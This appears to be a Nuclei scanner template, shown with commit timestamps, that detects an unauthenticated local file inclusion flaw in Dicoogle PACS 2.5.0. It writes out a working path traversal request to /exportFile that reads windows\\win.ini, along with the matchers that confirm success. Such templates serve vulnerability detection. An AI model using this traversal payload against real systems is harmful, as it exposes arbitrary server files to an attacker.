2021-12-23 23:57:26 +00:00
id : dicoogle-pacs-lfi
info :
2022-07-26 13:45:11 +00:00
name : Dicoogle PACS 2.5.0 - Local File Inclusion
2021-12-23 23:57:26 +00:00
author : 0x_akoko
severity : high
2022-07-26 13:45:11 +00:00
description : Dicoogle PACS 2.5.0 is vulnerable to local file inclusion. This allows an attacker to read arbitrary files that the web user has access to. Admin credentials aren't required.
2021-12-24 13:53:04 +00:00
reference :
2022-07-26 13:45:11 +00:00
- https://www.exploit-db.com/exploits/45007
2021-12-24 13:53:04 +00:00
- https://cxsecurity.com/issue/WLB-2018070131
- http://www.dicoogle.com/home
2022-07-26 13:45:11 +00:00
classification :
cvss-metrics : CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score : 7.5
cwe-id : CWE-22
2022-08-27 04:41:18 +00:00
tags : edb,windows,lfi,dicoogle
2021-12-23 23:57:26 +00:00
requests :
- method : GET
path :
- "{{BaseURL}}/exportFile?UID=..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini"
matchers :
- type : word
2021-12-24 13:53:04 +00:00
part : body
2021-12-23 23:57:26 +00:00
words :
- "bit app support"
- "fonts"
- "extensions"
condition : and
2022-07-26 13:45:11 +00:00
# Enhanced by mp on 2022/07/22